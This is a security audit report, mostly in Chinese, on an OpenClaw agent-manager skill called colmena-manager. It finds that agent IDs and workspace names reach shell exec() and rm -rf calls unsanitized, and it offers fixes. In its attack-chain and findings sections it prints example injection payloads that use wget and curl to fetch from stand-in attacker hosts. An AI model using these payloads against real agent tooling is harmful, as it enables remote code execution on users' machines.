安全决策报告
colmena-manager
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
最直接的威胁证据
01
Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash') reconnaissance · src/index.js
02
Victim runs 'colmena-manager health-check' to monitor the hive 初始入口 · src/index.js
03
healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1 权限提升 · src/index.js
为什么得出这个结论
3/4 个维度触发 阻止
声明与实际能力
发现 2 项声明之外的能力或越权行为。
阻止
隐藏执行与外联
提取到 1 个高危 IOC 或外联信号。
阻止
攻击链与高危发现
报告包含 4 步攻击链,另有 3 项高危或严重发现。
通过
依赖与供应链卫生
依赖结构存在,但暂未看到明显高危告警。
攻击链
01
Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
reconnaissance · src/index.js:12
02
Victim runs 'colmena-manager health-check' to monitor the hive
初始入口 · src/index.js:120
03
healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1
权限提升 · src/index.js:131
04
Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
最终危害 · src/index.js:131
风险分是怎么被拉高的
Undeclared shell execution +15
SKILL.md describes only OpenClaw API calls (agents_list, sessions_list, sessions_send) but never mentions exec() shell commands used throughout src/index.js
Command injection — agentId +15
agentId from API responses is interpolated into shell commands in logs() (line 66), healthCheck() (line 131), and checkMemory() (line 162) without sanitization
Command injection — workspace name +10
workspace name (user-controlled CLI argument) is directly interpolated into rm -rf command in workspaceRemove() (line 193); path traversal possible
Missing allowed-tools declaration +5
Neither SKILL.md nor claws.json declares shell:WRITE or filesystem:WRITE permissions required by the exec() calls
Hardcoded user path dependency +3
All paths hardcoded to /home/nvi/ — a specific user account not mentioned as a prerequisite
Non-existent HEARTBEAT.md referenced +2
SKILL.md advertises HEARTBEAT.md for automatic 30-min health checks but the file does not exist in the project
最关键的证据
高危 代码执行
Command injection via agentId in multiple exec() calls
The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.
src/index.js:66 Validate agentId against a strict alphanumeric/whitelist pattern before using in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
高危 代码执行
Command injection via workspace name in rm -rf
The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.
src/index.js:193 Validate workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
高危 文档欺骗
Shell execution completely absent from SKILL.md
SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication it requires shell:WRITE permissions or executes system commands.
SKILL.md:55 SKILL.md must explicitly declare shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
中危 文档欺骗
Referenced HEARTBEAT.md does not exist
SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.
SKILL.md:64 Either implement HEARTBEAT.md or remove all references to it from documentation. If implemented, declare its resource requirements explicitly.
中危 权限提升
No allowed-tools declaration despite full shell/filesystem access
claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.
claws.json:1 Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
低危 敏感访问
Hardcoded /home/nvi/ path creates dependency on specific user account
All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist.
src/index.js:66 Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.
声明能力 vs 实际能力
命令执行 阻止
声明 NONE
→ 推断 WRITE
src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.js:162 exec with ps|grep|awk | src/index.js:193 exec with rm 文件系统 阻止
声明 NONE
→ 推断 WRITE
src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec 技能调用 通过
声明 NONE
→ 推断 READ
src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API section 可疑产物与外联
严重 危险命令
rm -rf / src/index.js:193
中危 外部 URL
https://clawhub.com/colmena-manager claws.json:15
依赖与供应链
| 包名 | 版本 | 来源 | 漏洞 | 备注 |
|---|---|---|---|---|
| openclaw | >=1.0.0 | npm (peer dep) | 否 | Peer dependency, not bundled. No known vulnerabilities. |
文件构成
5 个文件 · 552 行
JavaScript 1 个文件 · 289 行Markdown 2 个文件 · 211 行JSON 2 个文件 · 52 行
需关注文件 · 3
src/index.js Command injection via agentId in multiple exec() calls · Command injection via workspace name in rm -rf · Hardcoded /home/nvi/ path creates dependency on specific user account · rm -rf /
SKILL.md Shell execution completely absent from SKILL.md · Referenced HEARTBEAT.md does not exist
claws.json No allowed-tools declaration despite full shell/filesystem access · https://clawhub.com/colmena-manager · [email protected]
其他文件 · README.md · package.json
安全亮点
Skill implements its stated functionality (agent management) without additional hidden data exfiltration
No base64-encoded payloads or obfuscated code blocks found
No credential harvesting from ~/.ssh, ~/.aws, or .env files
No network requests to external IPs detected
No reverse shell, C2, or data theft mechanisms present
No cron/scheduled task persistence mechanisms found
No malicious dependencies detected; package.json has minimal legitimate dependencies